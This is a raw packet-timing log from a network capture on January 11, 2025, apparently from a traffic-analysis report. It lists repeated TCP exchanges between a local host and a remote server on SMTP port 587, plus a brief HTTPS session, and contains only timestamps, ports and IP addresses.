                                                                                                              Jan 11, 2025 09:23:29.023920059 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:29.029462099 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.263776064 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.263958931 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:29.268870115 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.503464937 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.503952980 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:29.508884907 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.745408058 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.745471001 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.745512962 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.745537996 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:29.745551109 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:29.748044968 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:29.776761055 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:29.781621933 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.016757965 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.020392895 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:30.025393963 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.246028900 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:30.246071100 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.246191978 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:30.249731064 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:30.249744892 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.260145903 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.264136076 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:30.269037008 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.503766060 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.504053116 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:30.508965015 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.721966028 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.722039938 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:30.723674059 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:30.723687887 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.723932981 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.762391090 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.762674093 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:30.767595053 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.872066975 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:30.915333033 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.981367111 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.981445074 CET44349737104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:30.981545925 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:30.986869097 CET49737443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:31.013257027 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.013469934 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.018599987 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.369532108 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.369782925 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.374670029 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.511476040 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.516448021 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.516530037 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.609380960 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.610135078 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.610203981 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.610228062 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.610258102 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:31.615011930 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.615027905 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.615134954 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:31.615149021 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.282655001 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.282916069 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:32.287811041 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.480573893 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.515456915 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.517553091 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:32.522420883 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.523327112 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:32.749799013 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.750387907 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:32.755173922 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.984730959 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.984783888 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.984822989 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.984857082 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.984893084 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:32.984895945 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:32.984982014 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:32.986594915 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:32.991538048 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.219337940 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.230292082 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:33.235455036 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.462800026 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.463119984 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:33.468055010 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.695565939 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.695915937 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:33.700810909 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.949054003 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:33.949433088 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:33.954396009 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.192420959 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.192852020 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:34.198493958 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.434741020 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.434969902 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:34.439784050 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.667445898 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.668200016 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:34.668333054 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:34.668365002 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:34.668392897 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:34.674519062 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.674546003 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.676160097 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:34.676172972 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:35.516705036 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:35.570213079 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:47.481041908 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:47.481143951 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:50.516829014 CET5874973877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:50.516916990 CET49738587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:57.690294027 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:57.691126108 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:57.692428112 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:57.695209026 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:57.695944071 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:57.697283983 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:57.697376966 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:58.454283953 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:58.454502106 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:58.461800098 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:58.678211927 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:58.678400040 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:58.683149099 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:58.899570942 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:58.900814056 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:58.905565977 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.123728037 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.123755932 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.123765945 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.123780012 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.123821974 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:59.123831987 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.123855114 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:59.127568960 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:59.132324934 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.350187063 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.354634047 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:59.359594107 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.576936960 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.577635050 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:59.583304882 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.798948050 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:24:59.800774097 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:24:59.807245970 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.047277927 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.048077106 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.052918911 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.282227039 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.282591105 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.287414074 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.619434118 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.619820118 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.624694109 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.841236115 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.849890947 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.849965096 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.850019932 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.850110054 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.852087021 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.854823112 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854835033 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854846954 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854875088 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.854948997 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854990005 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.856926918 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.856947899 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.856987953 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857004881 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857013941 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857037067 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857047081 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857062101 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857070923 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857080936 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857093096 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857103109 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857125044 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857140064 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857157946 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857233047 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.859664917 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.859721899 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.859771013 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.859817028 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.861740112 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861787081 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.861812115 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861856937 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.861938000 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861974955 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861988068 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862018108 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862039089 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862049103 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862063885 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862097025 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862118006 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862129927 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862184048 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862186909 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862241983 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.864542961 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.864634991 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866585016 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866710901 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866720915 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866803885 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866874933 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866965055 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867063046 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867083073 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867217064 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867273092 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867281914 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867362976 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867372036 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867424965 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867434025 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867466927 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867475986 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867506027 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867515087 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867583990 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867594004 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867604971 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:01.811378956 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:01.851641893 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.742290020 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.747308016 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.963879108 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.964027882 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.964080095 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.964437962 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.966104984 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.969192982 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.970962048 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.971029997 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.596077919 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.596230030 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.601068020 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.820884943 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.821156025 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.826026917 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.945843935 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.950910091 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.951004982 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.028007030 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.032938957 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:06.033070087 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.657536983 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:06.657810926 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.662676096 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:06.887729883 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:06.890706062 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.898521900 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.117974043 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.118674994 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:07.123830080 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.347610950 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.347640991 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.347654104 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.347754955 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.347783089 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:07.347824097 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:07.350189924 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:07.355060101 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.577486992 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.578702927 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:07.583688974 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.805979967 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:07.806332111 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:07.811121941 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.033379078 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.033710957 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:08.038553953 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.279114962 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.279422045 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:08.284696102 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.522310019 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.522594929 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:08.527975082 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.863101959 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:08.863497019 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:08.868360996 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.090877056 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.091305971 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.091305971 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.092511892 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.092531919 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.092765093 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.096196890 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.096364021 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097331047 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097340107 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097348928 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.097543001 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.097584963 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097594976 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097620964 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097630024 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097655058 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.097667933 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097698927 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.097728014 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.097758055 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.100918055 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.100927114 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.101063013 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.101080894 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.101157904 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.102163076 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.102252007 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.102356911 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:09.102437019 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:09.102441072 CET5875001577.88.21.158192.168.2.4
